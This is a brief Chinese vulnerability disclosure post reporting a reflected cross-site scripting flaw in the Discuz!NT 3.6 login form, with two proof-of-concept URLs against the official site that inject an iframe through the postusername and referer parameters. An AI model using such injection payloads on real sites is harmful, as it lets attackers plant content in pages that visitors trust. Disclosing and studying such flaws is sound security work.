By:猪哥靓

Discuz!NT 3.6 跨站漏洞 -- 官网测试

    登陆框提交用户名或密码的时候存在跨站漏洞。

以下是引用片段:

http://nt.discuz.net/login.aspx?postusername=%22%3E%3Ciframe%20src=%22https://lcx.cc%22%3E

    可以这样利用的,[size=-1]example:

以下是引用片段:

example:http://nt.discuz.net/login.aspx?referer=%22%3E%3Ciframe%20src=%22https://lcx.cc%22%3E